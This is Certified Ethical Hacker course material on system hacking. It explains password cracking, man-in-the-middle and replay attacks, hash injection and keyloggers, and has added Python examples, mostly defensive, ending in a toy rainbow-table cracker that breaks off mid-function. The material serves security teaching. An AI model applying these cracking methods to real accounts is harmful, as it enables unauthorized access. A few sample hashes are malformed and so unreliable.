Ethical Hacking and Countermeasures v8
Module 05: System Hacking
Exam 312-50 Certified Ethical Hacker

Engineered by Hackers. Presented by Professionals.

Module 05 Page 518

Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Security News

IEEE Hack Confirmed, 100k Plain Text Passwords Vulnerable

September 26th, 2012
Source: http://www.kitguru.net
After details were revealed by Radu Dragusin over at IEEElog.com recently that passwords and
user details for some 100,000 members of the Institute of Electrical and Electronics Engineers
had been made publicly available on the company's FTP server for at least a month, the
organization confirmed this in a communication to members, advising them to change their
details immediately.
The IEEE is an organization that is designed to advance technology and has over 400,000
members worldwide, many of those including employees at Apple, Google, IBM, Oracle, and
Samsung. It is responsible for globally used standards like the IEEE 802.3 Ethernet standard and
the IEEE 802.11 Wireless Networking standard. At an organization like this, you'd expect
security to be high.
Still, this hack was no hoax. The official announcement of it reads: "IEEE has become aware of
an incident regarding inadvertent access to unencrypted log files containing user IDs and
passwords. This matter has been addressed and resolved. None of your financial information
was made accessible in this situation."
The company continued saying, though, that it was technically possible that during the time this
information was available someone could have used it to access a user's account and therefore,
as a "precautionary measure," the IEEE recommended all users change their account information.
Until that time, users were not able to access their account at all.
In what seems like quite a bold move, the organization went on to explain to users that one of
the best ways to protect themselves is to use a strong, unique password for their login.
Considering it was an IEEE security blunder that caused the hack, advising other people on
password strength seems a bit hypocritical.
That said, in Mr Dragusin's reveal of the hacked information, he produced a graph detailing
some of the most commonly used passwords. Almost 300 people used "123456" and other
variations of numbers in that same configuration, while hundreds of others used passwords like
"admin," "student," and "ieee2012." Considering the involvement of IEEE members in pushing
the boundaries of current technology, you'd assume we wouldn't need to turn to Eugene "The
Plague" Belford to explain the importance of password security.

Copyright © 2010-2013 KitGuru Limited
Author: Jon Martindale
http://www.kitguru.net/channel/jon-martindale/ieee-hack-confirmed-100k-plain-textpasswords-vulnerable/

Module Objectives
The preceding modules dealt with the progressive intrusion that an attacker makes towards his or
her target system(s). You should bear in mind that this does not indicate a culmination of the
attack. This module familiarizes you with:
- System Hacking: Goals
- CEH Hacking Methodology (CHM)
- Password Cracking
- Stealing Passwords Using Keyloggers
- Microsoft Authentication
- How to Disable LM HASH
- How to Defend against Password Cracking
- Privilege Escalation
- Executing Applications
- Types of Keystroke Loggers and Spywares
- Anti-Keylogger and Anti-Spywares
- Detecting Rootkits
- Anti-Rootkits
- NTFS Stream Manipulation
- Classification of Steganography
- Steganalysis Methods/Attacks on Steganography
- Covering Tracks
- Penetration Testing

Information at Hand Before System Hacking Stage
Before beginning with system hacking, let's go over the phases you went through and the
information you collected so far. Prior to this module, we discussed:

Footprinting Module
Footprinting is the process of accumulating data regarding a specific network environment.
Usually this technique is applied for the purpose of finding ways to intrude into the network
environment. Since footprinting can be used to attack a system, it can also be used to protect
it. In the footprinting phase, the attacker creates a profile of the target organization, with
information such as its IP address range, namespace, and employee web usage.
Footprinting improves the ease with which the systems can be exploited by revealing system
vulnerabilities. Determining the objective and location of an intrusion is the primary step
involved in footprinting. Once the objective and location of an intrusion are known, specific
information about the organization can be gathered using non-intrusive methods.
For example, the web page of the organization itself may provide employee bios or a personnel
directory, which the hacker can use for social engineering to reach the objective. Conducting a
Whois query on the web provides the associated networks and domain names related to a specific
organization.

Scanning Module
Scanning is a procedure for identifying active hosts on a network, either for the purpose of
network security assessment or for attacking them. In the scanning phase, the attacker finds
information about the target through its IP addresses that can be accessed over the Internet.
Scanning is mainly concerned with the identification of systems on a network and the
identification of services running on each computer.
Some of the scanning procedures, such as port scans and ping sweeps, return information about
the services offered by the live hosts that are active on the Internet and their IP addresses.
The inverse mapping scanning procedure returns information about the IP addresses that do not
map to live hosts; this allows an attacker to make suppositions about feasible addresses.

Enumeration Module
Enumeration is the method of intrusive probing into the target through which attackers gather
information such as network user lists, routing tables, and Simple Network Management Protocol
(SNMP) data. This is significant because the attacker crosses over into the target territory to
unearth information about the network, including shares, users, groups, applications, and
banners.
The attacker's objective is to identify valid user accounts or groups where he or she can remain
inconspicuous once the system has been compromised. Enumeration involves making active
connections to the target system or subjecting it to direct queries. Normally, an alert and
secure system will log such attempts. Often the information gathered is what the target might
have made public, such as a DNS address; however, it is possible that the attacker stumbles
upon a remote IPC share, such as IPC$ in Windows, that can be probed with a null session,
allowing shares and accounts to be enumerated.


System Hacking: Goals
Every criminal commits a crime to achieve a certain goal. Likewise, an attacker can also have
certain goals behind performing attacks on a system. The following table shows the goal of an
attacker at different hacking stages and the technique used to achieve that goal.

Hacking Stage           Goal                                                  Technique/Exploit Used
Gaining Access          To collect enough information to gain access          Password eavesdropping, brute forcing
Escalating Privileges   To create a privileged user account if the user       Password cracking, known exploits
                        level is obtained
Executing Applications  To create and maintain backdoor access                Trojans
Hiding Files            To hide malicious files                               Rootkits
Covering Tracks         To hide the presence of compromise                    Clearing logs

FIGURE 5.1: Goals for System Hacking

CEH Hacking Methodology (CHM)
Before hacking a system, an attacker uses footprinting, scanning, and enumeration techniques to
detect the target area of the attack and the vulnerabilities that prove to be doorways for the
attacker. Once the attacker gains all the necessary information, he or she starts hacking.
Similar to the attacker, an ethical hacker also follows the same steps to test a system or
network. In order to ensure the effectiveness of the test, the ethical hacker follows the hacking
methodology. The following diagram depicts the hacking methodology followed by ethical hackers:

FIGURE 5.2: CEH Hacking Methodology (CHM)

CEH System Hacking Steps
System hacking cannot be accomplished in a single go. It is accomplished through various steps
that include cracking passwords, escalating privileges, executing applications, hiding files,
covering tracks, and finally penetration testing. Now it's time to discuss these steps one by one
thoroughly, to determine how the attacker hacks the system. In an attempt to hack a system, the
attacker first tries to crack passwords.
This section describes the first step, i.e., password cracking, and covers the different tools
and techniques an attacker uses to crack the password of the target system.

- Cracking Passwords
- Escalating Privileges
- Executing Applications
- Hiding Files
- Covering Tracks
- Penetration Testing

Password Cracking
Password cracking is the process of recovering passwords from the data that has been transmitted
by a computer system or stored in it. The purpose of password cracking might be to help a user
recover a forgotten or lost password, to serve as a preventive measure by system administrators
to check for easily crackable passwords, or to gain unauthorized access to a system.
Many hacking attempts start with password cracking attempts. Passwords are the key piece of
information necessary to access a system. Consequently, most attackers use password cracking
techniques to gain unauthorized access to the vulnerable system. Passwords may be cracked
manually or with automated tools using methods such as dictionary or brute-force attacks.
The effectiveness of a password-cracking program is a function of the number of candidate
passwords per second it can check. Often users, while creating passwords, select passwords that
are predisposed to being cracked, such as using a pet's name or choosing one that's simple so
they can remember it. Most password cracking techniques are successful due to weak or easily
guessable passwords.

Password Complexity
Password complexity plays a key role in improving security against attacks. It is the important
element that users should ensure while creating a password. The password should not be simple,
since simple passwords are prone to attacks. The passwords that you choose should always be
complex, long, and difficult to remember. The password that you are setting for your account
must meet the complexity requirements policy setting.
Password characters should be a combination of alphanumeric characters. Alphanumeric characters
consist of letters, numbers, punctuation marks, and mathematical and other conventional symbols.
The following examples show the kinds of characters referred to:
- Passwords that contain letters, special characters, and numbers: apl@52
- Passwords that contain only numbers: 23698217
- Passwords that contain only special characters: &*#@!(%)
- Passwords that contain letters and numbers: meet123
- Passwords that contain only letters: POTHMYDE
- Passwords that contain only letters and special characters: bob@&ba
- Passwords that contain only special characters and numbers: 123@$4

Password Cracking Techniques
Password cracking is the technique used for discovering passwords. It is the classic
way to gain privileges to a computer system or network. The common approach for cracking a
password is to continually try guesses for the password with various combinations until you get
the correct one. There are five techniques for password cracking, as follows.

Dictionary Attacks
In a dictionary attack, a dictionary file is loaded into the cracking application that runs
against user accounts. This dictionary is a text file that contains a number of dictionary words.
The program uses every word present in the dictionary to find the password. Dictionary attacks
are more useful than brute force attacks. But this attack does not work with a system that uses
passphrases.
This attack can be applied under two situations:
- In cryptanalysis, it is used to find out the decryption key for obtaining plaintext from
  ciphertext.
- In computer security, to avoid authentication and access the computer by guessing passwords.

Methods to improve the success of a dictionary attack:
- Use a number of dictionaries, such as technical dictionaries and foreign-language
  dictionaries, which helps to retrieve the correct password
- Use string manipulation on the dictionary: if the dictionary contains the word "system",
  then also try manipulated forms such as "metsys"

Brute Forcing Attacks
Cryptographic algorithms must be sufficiently hardened in order to resist a brute-force attack.
The definition as stated by RSA: "Exhaustive key-search, or brute-force search, is the basic
technique for trying every possible key in turn until the correct key is identified."
When someone tries every possible encryption key for a piece of data until the needed information
is found, this is termed a brute-force attack. Until now, this type of attack was performed only
by those who had sufficient processing power.
The United States government once believed (in 1977) that the 56-bit Data Encryption Standard
(DES) was sufficient to deter all brute-force attacks, a claim that several groups across the
world had tested.
In cryptanalysis, a brute-force attack on a cipher is an exhaustive search of the keyspace: all
possible keys are tested in an attempt to recover the plaintext used to produce a particular
ciphertext. Any method that finds the key or plaintext faster than a brute-force search can be
considered a way of breaking the cipher, and a cipher is secure if no method exists to break it
other than brute force. Most ciphers lack a mathematical proof of security.
If the keys are originally chosen randomly or searched randomly, the plaintext will, on average,
become available after half of all the possible keys are tried.
Some of the considerations for brute-force attacks are as follows:
- It is a time-consuming process
- All passwords will eventually be found
- Attacks against NT hashes are much more difficult than attacks against LM hashes

Hybrid Attack
This type of attack depends upon the dictionary attack. There are chances that people might
change their password by just adding some numbers to their old password. In this type of attack,
the program adds some numbers and symbols to the words from the dictionary and tries to crack the
password. For example, if the old password is "system," then there is a chance that the person
will change it to "system1" or "system2."

Syllable Attack
A syllable attack is the combination of both a brute force attack and the dictionary attack.
This cracking technique is used when the password is not an existing word. Attackers use the
dictionary and other methods to crack it. It also uses the possible combination of every word
present in the dictionary.

Rule-based Attack
This type of attack is used when the attacker gets some information about the password. This is
the most powerful attack because the cracker knows the type of password. For example, if the
attacker knows that the password contains a two- or three-digit number, then he or she will use
some specific techniques and extract the password in less time.
By obtaining useful information such as use of numbers, the length of password, and special
characters, the attacker can easily adjust the time for retrieving the password to the minimum
and enhance the cracking tool to retrieve passwords. This technique involves brute force,
dictionary, and syllable attacks.
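As an added example (not from the module or EC-Council), the following Python audit puts the password complexity categories, the dictionary and hybrid variants ("system1", "metsys"), and the "half of all possible keys on average" brute-force figure into one check a defender can run over a password list before an attacker does. The wordlist and sample passwords are constructed, and the function names (audit, weakness, hybrid_candidates) are mine, not any tool's API.

```python
import string

# Alphabet sizes a brute-force search has to sweep, per character class (printable ASCII).
CLASS_SIZES = {
    "lowercase": 26,
    "uppercase": 26,
    "numbers": 10,
    "special": len(string.punctuation),  # 32 punctuation/symbol characters
}

# Constructed wordlist standing in for a dictionary file; a real run loads a large
# text file (technical and foreign-language dictionaries included).
WORDLIST = {"system", "password", "admin", "student", "ieee", "meet", "bob"}


def character_classes(pw):
    """Return the set of character classes pw uses, e.g. {'lowercase', 'special'}."""
    classes = set()
    for c in pw:
        if c in string.ascii_lowercase:
            classes.add("lowercase")
        elif c in string.ascii_uppercase:
            classes.add("uppercase")
        elif c in string.digits:
            classes.add("numbers")
        elif c in string.punctuation:
            classes.add("special")
        else:
            classes.add("other")  # non-ASCII or whitespace; not counted in the alphabet
    return classes


def brute_force_cost(pw):
    """(alphabet size, keyspace, average guesses) for an exhaustive search.

    The alphabet is the union of the classes the password actually uses; the
    average-case figure reflects that half the keyspace is tried on average
    before the right candidate comes up.
    """
    alphabet = sum(CLASS_SIZES.get(c, 0) for c in character_classes(pw))
    keyspace = alphabet ** len(pw)
    return alphabet, keyspace, keyspace // 2


def hybrid_base(pw):
    """Split pw into the dictionary-word part and the digit/symbol suffix a hybrid attack appends."""
    base = pw.rstrip(string.digits + string.punctuation)
    return base, pw[len(base):]


def hybrid_candidates(words, max_digits=3):
    """Candidates a hybrid/rule-based run tries: each word and its reversal, each
    followed by 0..max_digits digits. Compare this count with brute_force_cost."""
    suffixes = sum(10 ** k for k in range(0, max_digits + 1))  # '' plus 1..n digits
    return len(words) * 2 * suffixes


def weakness(pw, words=WORDLIST):
    """Explain why pw would fall to a dictionary, hybrid or rule-based run, else None."""
    lower = pw.lower()
    if lower in words:
        return f"dictionary word '{lower}'"
    if lower[::-1] in words:
        return f"reversed dictionary word '{lower[::-1]}'"
    base, suffix = hybrid_base(lower)
    if suffix and base in words:
        return f"hybrid: dictionary word '{base}' plus suffix '{suffix}'"
    if suffix and base[::-1] in words:
        return f"hybrid: reversed dictionary word '{base[::-1]}' plus suffix '{suffix}'"
    if character_classes(pw) <= {"numbers"}:
        return "numbers only: keyspace is 10^len, trivial for brute force"
    if len(pw) < 8:
        return f"only {len(pw)} characters: keyspace too small even with mixed classes"
    return None


def audit(pw, words=WORDLIST):
    """Full report for one password, combining the checks above."""
    alphabet, keyspace, average = brute_force_cost(pw)
    return {
        "password": pw,
        "classes": sorted(character_classes(pw)),
        "alphabet_size": alphabet,
        "keyspace": keyspace,
        "average_guesses": average,
        "weakness": weakness(pw, words),
    }


if __name__ == "__main__":
    # Sample passwords are constructed; several echo the module's own examples.
    for pw in ["123456", "system1", "metsys", "POTHMYDE", "apl@52", "bob@&ba", "Tr0ub4dor&3"]:
        r = audit(pw)
        print(f"{pw:12s} classes={','.join(r['classes']):30s} "
              f"keyspace={r['keyspace']:.2e}  weak: {r['weakness']}")
    print("hybrid candidates over the constructed wordlist:", hybrid_candidates(WORDLIST))
```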

Types of Password Attacks
1. Passive Online Attacks: the attacker performs password hacking without communicating with the
   authorizing party (wire sniffing, man-in-the-middle, replay)
2. Active Online Attacks: the attacker tries a list of passwords one by one against the victim to
   crack the password (password guessing, Trojan/spyware/keyloggers, hash injection, phishing)
3. Offline Attacks: the attacker copies the target's password file and then tries to crack the
   passwords on his own system at a different location (pre-computed hashes, distributed
   network, rainbow)
4. Non-Electronic Attacks: the attacker need not possess technical knowledge to crack the
   password, hence known as non-technical attacks (shoulder surfing, social engineering,
   dumpster diving)
Password cracking is one of the crucial stages of hacking a system. Password cracking used for
legal purposes recovers the forgotten password of a user; if it is used by illegitimate users,
it can cause them to gain unauthorized privilege to the network or system. Password attacks are
classified based on the attacker's actions to crack a password. Usually there are four types.
They are:

Passive Online Attacks
A passive attack is an attack on a system that does not result in a change to the system in any
way. The attack is to purely monitor or record data. A passive attack on a cryptosystem is one
in which the cryptanalyst cannot interact with any of the parties involved, attempting to break
the system solely based upon observed data. There are three types of passive online attacks.
They are:
- Wire sniffing
- Man-in-the-middle
- Replay

Active Online Attacks
An active online attack is the easiest way to gain unauthorized administrator-level access to
the system. There are three types of active online attacks. They are:
- Password guessing
- Trojan/spyware/keylogger
- Hash injection
- Phishing

Offline Attacks
Offline attacks occur when the intruder checks the validity of the passwords. He or she observes
how the password is stored in the targeted system. If the user names and the passwords are
stored in a file that is readable, it becomes easy for the intruder to gain access to the
system. In order to protect your password list, it should always be kept in an unreadable form,
which means the passwords have to be encrypted.
Offline attacks are often time consuming. They are successful because the LM hashes are
vulnerable due to a smaller keyspace and shorter length. Different password cracking techniques
are available on the Internet.
The techniques to prevent or protect from offline attacks are:
- Use good passwords
- Remove LM hashes
- Attacker has the password database
- Use cryptographically secure methods while representing the passwords
There are three types of offline attacks. They are:
- Pre-computed hashes
- Distributed network
- Rainbow

Non-Electronic Attacks
Non-electronic attacks are also known as non-technical attacks. This kind of attack doesn't
require any technical knowledge about the methods of intruding into another's system. Therefore,
it is called a non-electronic attack. There are three types of non-electronic attacks. They are:
- Shoulder surfing
- Social engineering
- Dumpster diving

Passive Online Attack: Wire Sniffing
A packet sniffer tool is seldom used for an attack. This is because a sniffer can work only in a
common collision domain. Common collision domains are not connected by a switch or bridge. All
the hosts on that network are also not switched or bridged in the network segment.
As sniffers gather packets at the Data Link Layer, they can grab all packets on the LAN of the
machine that is running the sniffer program. This method is relatively hard to perpetrate and is
computationally complicated.
This is because a network with a hub implements a broadcast medium that all systems share on the
LAN. Any data sent across the LAN is actually sent to each and every machine connected to the
LAN. If an attacker runs a sniffer on one system on the LAN, he or she can gather data sent to
and from any other system on the LAN. The majority of sniffer tools are ideally suited to sniff
data in a hub environment. These tools are called passive sniffers as they passively wait for
data to be sent, before capturing the information. They are efficient at imperceptibly gathering
data from the LAN. The captured data may include passwords sent to remote systems during Telnet,
FTP, rlogin sessions, and electronic mail sent and received. Sniffed credentials are used to gain
unauthorized access to the target system. There are a variety of tools available on the Internet
for passive wire sniffing.


Passive Online Attacks: Man-in-the-Middle and Replay Attack

- In a MITM attack, the attacker acquires access to the communication channels between victim and server to extract the information
- In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, the tokens are placed back on the network to gain access

Considerations:
- Relatively hard to perpetrate
- Must be trusted by one or both sides
- Can sometimes be broken by invalidating traffic

Passive Online Attack: Man-in-the-Middle and Replay Attack

When two parties are communicating, the man-in-the-middle attack can take place. In this case, a third party intercepts the communication between the two parties, assuring the two parties that they are communicating with each other. Meanwhile, the third party alters the data or eavesdrops and passes the data along. To carry this out, the man in the middle has to sniff from both sides of the connection simultaneously. This type of attack is often found in telnet and wireless technologies. It is not easy to implement such attacks due to the TCP sequence numbers and speed. This method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.

In a replay attack, packets are captured using a sniffer. After the relevant information is extracted, the packets are placed back on the network. This type of attack can be used to replay bank transactions or other similar types of data transfer in the hope of replicating or changing activities, such as deposits or transfers.
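As an added example (not part of the module), the replay attack described above against a token-based login: a weak verifier that checks only the token's integrity accepts a sniffed token every time it is put back on the wire, while a hardened verifier binds each token to a freshness window and a one-time nonce. The token format, the shared key and the 30-second window are assumptions of this example.

```python
import hashlib
import hmac
import secrets

# Shared secret between the issuing server and the verifier (constructed demo value).
DEMO_KEY = b"constructed-demo-key-do-not-reuse"


def issue_token(user, issued_at, key=DEMO_KEY, nonce=None):
    """Build an authentication token: user|timestamp|nonce|HMAC-SHA256.

    The nonce makes every token unique even for the same user and second,
    which is what lets the verifier tell a replay from a fresh request.
    """
    nonce = nonce or secrets.token_hex(8)
    body = f"{user}|{issued_at}|{nonce}"
    mac = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{mac}"


def verify_mac_only(token, key=DEMO_KEY):
    """Weak verifier: integrity only. A sniffed token passes every time it is
    placed back on the network, which is exactly the replay attack."""
    user, issued_at, nonce, mac = token.split("|")
    body = f"{user}|{issued_at}|{nonce}"
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


class ReplayGuard:
    """Hardened verifier: integrity + freshness window + one-time nonce."""

    def __init__(self, window_s=30, key=DEMO_KEY):
        self.window_s = window_s
        self.key = key
        self.seen = {}  # nonce -> time after which it can be forgotten

    def _evict(self, now):
        # A nonce older than the window would fail the staleness check anyway,
        # so it no longer needs to be remembered.
        self.seen = {n: exp for n, exp in self.seen.items() if exp > now}

    def verify(self, token, now):
        """Return (accepted, reason_or_user)."""
        parts = token.split("|")
        if len(parts) != 4:
            return False, "malformed"
        user, issued_at, nonce, mac = parts
        body = f"{user}|{issued_at}|{nonce}"
        expected = hmac.new(self.key, body.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, mac):
            return False, "bad-mac"          # tampered or forged
        try:
            issued_at = int(issued_at)
        except ValueError:
            return False, "malformed"
        if abs(now - issued_at) > self.window_s:
            return False, "stale"            # captured long ago, or clock skew
        self._evict(now)
        if nonce in self.seen:
            return False, "replay"           # this exact token was already accepted
        self.seen[nonce] = issued_at + self.window_s
        return True, user


def demo():
    """Feed one sniffed token twice to both verifiers and return the outcomes."""
    token = issue_token("alice", issued_at=1000)
    weak = (verify_mac_only(token), verify_mac_only(token))        # (True, True)
    guard = ReplayGuard(window_s=30)
    hardened = (guard.verify(token, now=1005), guard.verify(token, now=1006))
    return weak, hardened


if __name__ == "__main__":
    print(demo())
```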

[Figure: Victim and Web Server joined by the original connection; the attacker sniffs the traffic and performs MITM / Replay]

FIGURE 5.4: Passive Online Attack by Using Man-in-the-Middle and Replay Attack


Active Online Attack: Password Guessing

- The attacker takes a set of dictionary words and names, and tries all the possible combinations to crack the password

Considerations:
- Time consuming
- Requires huge amounts of network bandwidth
- Easily detected

Active Online Attack: Password Guessing

Everyone knows your username, but your password is a well-kept secret in order to keep others away from accessing your transactions.

With the aid of dictionary attack methodologies, an intruder tries many means to guess your password. In this methodology, an attacker takes a set of dictionary words and names, and makes all the possible combinations to get your password. The attacker performs this method with programs that guess hundreds or thousands of words per second. This makes it easy for them to try many variations: backwards words, different capitalization, adding a digit to the end, etc.

To facilitate this further, the attacker community has built large dictionaries that include words from foreign languages, or names of things, places, and towns modeled to crack passwords. Attackers can also scan your profiles to look for words that might break your password. A good password is easy to remember, but hard to guess, so you need to protect your password by making it appear random by inserting such things as digits and punctuation. The more intricate your password, the more difficult it becomes for the intruder to break.

FIGURE 5.5: Active Online Attack by Using Password Guessing Method

Some of the considerations for password guessing are as follows:
- Takes a long time to be guessed
- Requires huge amounts of network bandwidth
- It can be easily detected
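The "easily detected" consideration above, as an added example that is not part of the module: this Python parses constructed sshd-style authentication lines (RFC 5737 documentation addresses, not a real capture) and flags sources that exceed a failure threshold inside a sliding window, counts the distinct usernames each source tried, and marks a success that follows such a burst. The log format, threshold and window are assumptions of this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log: one source hammering several accounts, one ordinary typo.
SAMPLE_LOG = [
    "Mar 12 10:01:02 bastion sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 51522 ssh2",
    "Mar 12 10:01:04 bastion sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 51523 ssh2",
    "Mar 12 10:01:09 bastion sshd[2214]: Failed password for root from 203.0.113.7 port 51530 ssh2",
    "Mar 12 10:01:11 bastion sshd[2214]: Failed password for root from 203.0.113.7 port 51531 ssh2",
    "Mar 12 10:01:15 bastion sshd[2219]: Failed password for invalid user oracle from 203.0.113.7 port 51540 ssh2",
    "Mar 12 10:01:20 bastion sshd[2222]: Failed password for jsmith from 198.51.100.4 port 40022 ssh2",
    "Mar 12 10:01:22 bastion sshd[2225]: Failed password for jsmith from 203.0.113.7 port 51551 ssh2",
    "Mar 12 10:01:30 bastion sshd[2225]: Accepted password for jsmith from 203.0.113.7 port 51552 ssh2",
    "Mar 12 10:02:01 bastion sshd[2230]: Accepted password for jsmith from 198.51.100.4 port 40023 ssh2",
]

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_line(line, year=2012):
    """Parse one sshd authentication line; None for lines that are not auth events."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies it (2012 assumed here)
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_guessing(lines, threshold=5, window_s=60):
    """Flag source IPs with >= threshold failed logins inside any window_s span.

    Also records how many distinct usernames a source tried (spraying looks
    like few failures per user but many users per source) and whether a
    success followed the burst, which is the event worth paging on.
    """
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> usernames tried so far
    alerts = {}
    for e in events:
        ip = e["ip"]
        if e["result"] == "Accepted":
            if ip in alerts:
                alerts[ip]["success_after_burst"] = True
            continue
        q = recent[ip]
        q.append(e["ts"])
        users[ip].add(e["user"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()               # slide the window forward
        if len(q) >= threshold:
            alerts[ip] = {
                "failures": len(q),
                "distinct_users": len(users[ip]),
                "first": q[0],
                "last": q[-1],
                "success_after_burst": alerts.get(ip, {}).get("success_after_burst", False),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_guessing(SAMPLE_LOG).items():
        print(ip, info)
```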


Active Online Attack: Trojan/Spyware/Keylogger

- Spyware is a type of malware that allows attackers to secretly gather information about a person or organization
- With the help of a Trojan, an attacker gets access to the stored passwords in the attacked computer and is able to read personal documents, delete files, and display pictures
- A Keylogger is a program that runs in the background and allows remote attackers to record every keystroke

Active Online Attack: Trojan/Spyware/Keylogger

A Trojan is a destructive program that masquerades as a benign application. Prior to the installation and/or execution, the software initially appears to perform a desirable function, but in practice it steals information or harms the system. With a Trojan, attackers may have remote access to the target computer. By installing the Trojan, attackers can access the computer remotely and perform various operations that are limited by user privileges on the target computer.

Spyware is a type of malware that can be installed on a computer to gather information about the users of the computer without their knowledge. This allows attackers to gather information about the user or the organization secretly. The presence of spyware is typically hidden from the user, and can be difficult to detect.

A keylogger is a program that records all the keystrokes that are typed on the computer keyboard without the knowledge of the user. Once keystrokes are logged, they are shipped to the attacker, or hidden in the machine for later retrieval. The attacker then scrutinizes them carefully for the purpose of finding passwords or other useful information that could be used to compromise the system.

For example, a keylogger is capable of revealing the contents of all emails composed by the user of the computer system on which the keylogger has been installed.

Active Online Attack: Hash Injection Attack

- A hash injection attack allows an attacker to inject a compromised hash into a local session and use the hash to validate to network resources
- The attacker finds and extracts a logged on domain admin account hash
- The attacker uses the extracted hash to log on to the domain controller

Active Online Attack: Hash Injection Attack

A hash injection attack is the concept of injecting a compromised hash into a local session and then using the hash to authenticate to the network resources. This attack is done successfully in four steps. They are:
- The hacker compromises one workstation/server using a local/remote exploit
- The hacker extracts logged-on hashes and finds a logged-on domain admin account hash
- The hacker uses the hash to log on to the domain controller
- The hacker extracts all the hashes in the Active Directory database and can now impersonate any account in the domain

FIGURE 5.6: Active Online Attack by Using Hash Injection Attack

Offline Attack: Rainbow Attacks

- Convert huge word lists like dictionary files and brute force lists into password hashes using techniques such as rainbow tables
- Compute the hash for a list of possible passwords and compare it with the precomputed hash table. If a match is found then the password is cracked
- It is easy to recover passwords by comparing captured password hashes to the precomputed tables

Offline Attack: Rainbow Attacks

Offline attacks occur when the intruder checks the validity of the passwords. He or she observes how the password is stored. If the user names and the passwords are stored in a file that is readable, it becomes easy for him or her to gain access to the system. Hence, the passwords list must be protected and kept in an unreadable form, such as an encrypted form. Offline attacks are time consuming. They are successful because the LM hashes are vulnerable due to smaller keyspace and shorter length.

Different password cracking techniques are available on the Internet. There are two types of offline attacks that an attacker can perform to discover the password:
- Rainbow Attacks
- Distributed Network Attacks

Rainbow Attacks

A rainbow attack is the implementation of the cryptanalytic time-memory trade-off technique. Cryptanalytic time-memory trade-off is the method that requires less time for cryptanalysis. It uses already calculated information stored in the memory to crack the cryptography. In the rainbow attack, the same technique is used; the password hash table is created in advance and stored into the memory. Such a table is called a "rainbow table."

Rainbow Table

A rainbow table is a lookup table specially used in recovering the plaintext password from a ciphertext. The attacker uses this table to look for the password and tries to recover the password from password hashes.

Computed Hashes

An attacker computes the hash for a list of possible passwords and compares it with the pre-computed hash table (rainbow table). If a match is found, then the password is cracked.

Compare the Hashes

It is easy to recover passwords by comparing captured password hashes to the precomputed tables.

Pre-Computed Hashes

Only encrypted passwords should be stored in a file containing username/encrypted password pairs. The typed password is encrypted using the hash function of cryptography during the logon process, and it is then compared with the password that is stored in the file. Encrypted passwords that are stored can prove useless against dictionary attacks. If the file that contains the encrypted password is in a readable format, the attacker can easily detect the hash function. He or she can then hash each word in the dictionary using the hash function, and then compare with the encrypted password. Thus the attacker obtains all passwords that are words listed in the dictionary.

Storage of hashes requires large memory space: LM "hashes" require 310 Terabytes and NT hashes < 15 chars require 5,652,897,009 Exabytes. Use a time-space tradeoff technique to reduce the memory space required to store hashes.

Examples of computed hashes (from the slide):

Iqazwed   -> 4259cc34599c530b28a6a8f225d668590
hh021da   -> c744bl716cbf8d4dd0ff4ce31al77151
9da8dasf  -> 3cd696a8571a843cda453a229d741843
sodifo8sf -> 7ad7d6fa6bb4fd28ab98b3dd33261e8f
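As an added example that is not part of the module and not the algorithm of rtgen or Winrtgen, the following Python works through the time-memory trade-off described above: it precomputes a toy rainbow table (chains of hash and position-dependent reduction, storing only endpoints), recovers a password from its unsalted MD5 hash, and then shows that the same password hashed with a per-user salt is not found in the table. The parameters (3 lowercase letters, MD5, chain length 20, 2000 chains) and the salt value are constructed for the demonstration.

```python
import hashlib

# Toy parameter set (constructed for the demonstration): 3 lowercase letters, MD5.
CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 3
KEYSPACE = len(CHARSET) ** PW_LEN       # 17,576 candidate passwords


def index_to_pw(i):
    """Map an integer in [0, KEYSPACE) onto a candidate password."""
    chars = []
    for _ in range(PW_LEN):
        i, r = divmod(i, len(CHARSET))
        chars.append(CHARSET[r])
    return "".join(chars)


def h(pw):
    """The unsalted hash being attacked (MD5, as in the slide's hash list)."""
    return hashlib.md5(pw.encode()).hexdigest()


def h_salted(pw, salt):
    """Defender's variant: a per-user salt is hashed together with the password,
    so a table precomputed over bare passwords never contains these hashes."""
    return hashlib.md5((salt + pw).encode()).hexdigest()


def reduce_fn(digest_hex, step):
    """Map a hash back into the password space. Mixing in the chain position
    is what makes the table 'rainbow': chains that collide at different
    positions do not merge, which is the source of the efficiency gain."""
    return index_to_pw((int(digest_hex[:12], 16) + step) % KEYSPACE)


def build_table(chain_len, num_chains):
    """Precompute chains; store only (endpoint -> start point) for each one."""
    table = {}
    for c in range(num_chains):
        start = index_to_pw((c * 7919) % KEYSPACE)   # spread the start points out
        pw = start
        for step in range(chain_len):
            pw = reduce_fn(h(pw), step)
        table.setdefault(pw, start)   # merged chains share an endpoint; keep the first
    return table


def lookup(table, target_hex, chain_len):
    """Recover the preimage of target_hex if some stored chain covers it."""
    for pos in range(chain_len - 1, -1, -1):
        # assume the target sits at position pos; recompute the endpoint from there
        pw = reduce_fn(target_hex, pos)
        for step in range(pos + 1, chain_len):
            pw = reduce_fn(h(pw), step)
        start = table.get(pw)
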